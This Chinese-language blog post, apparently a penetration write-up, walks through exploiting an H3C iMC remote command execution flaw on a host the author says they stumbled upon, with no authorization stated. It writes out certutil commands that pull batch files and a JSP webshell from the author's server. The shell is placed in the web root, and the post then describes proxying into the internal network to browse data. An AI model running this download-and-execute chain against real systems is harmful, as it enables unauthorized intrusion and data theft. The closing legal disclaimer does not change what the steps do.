利用 XVE-2024-4567 H3C iMC 远程命令执行漏洞获取权限

直接上干货

当时是无意中看到了这个h3c页面

image.png

然后搜搜h3c的历史漏洞,想看看有没有

抓包访问http ://xxxxx:8081/byod/index.xhtml 修改请求包

image.png

/selfservice/login.jsf也可以

image.png

可以看到能够执行命令,最后确定是历史漏洞XVE-2024-4567,通过网上找到绝对路径,D:/Program Files/iMC/client/web/apps/selfservice/images/

于是想通过远程命令执行传shell上去

首先尝试看是否能写入文件echo 112 > 132.txt

image.png

再用dir查看,成功写入

image.png

使用type 132.txt查看,的确写入了

image.png

然后使用del 132.txt删除就行,删不了就用del /f 132.txt 强制删除

到了这里就有一个问题了,命令太长执行不进去怎么办,菜菜的我一时没想到解决办法,后面想到了分开进去再拼接执行呢

因为命令太长,就用bat方式去写入执行

在自己的服务器上先写1.bat内容:certutil.exe -urlcache -split -f http ://xxxx/520.jsp

然后启用服务python3 -m http.server 80

image.png

再在漏洞处写入certutil.exe -urlcache -split -f http ://xxxx/1.bat,成功写入(看服务器也可以得知)

image.png

的确写进去了

image.png

再执行1.bat文件

image.png

再查看的确执行了

image.png

于是把他移动到已知的根目录下,应该是太长了,执行不了,于是继续用bat方式

image.png

写入2.bat

(move 520.jsp

"D:\Program Files\iMC\client\web\apps\selfservice\images\520.jsp")
**注:**一定是\ 而不是/

再执行命令certutil.exe -urlcache -split -f http ://xxxx/2.bat,成功写入

image.png

执行bat,把520.jsp移动过去

image.png

连接http ://xxxx:8081/selfservice/images/526.jsp

image.png

image.png

然后代理到本地,内网就好搞了,很多数据

image.png

image.png

image.png

image.png

还有很多东西不一一展示了。

温馨提示:本文内容仅用于合法授权的安全学习与研究交流,严禁用于未授权渗透测试、漏洞利用或任何违法行为。

涉及企业或平台的未公开漏洞信息,请遵循负责任披露原则,勿公开传播可直接复现的敏感细节。

如存在侵权、错误信息或不当内容,请联系站方处理,我们将及时核实并删除。邮箱:admin@baimaojianghu.com。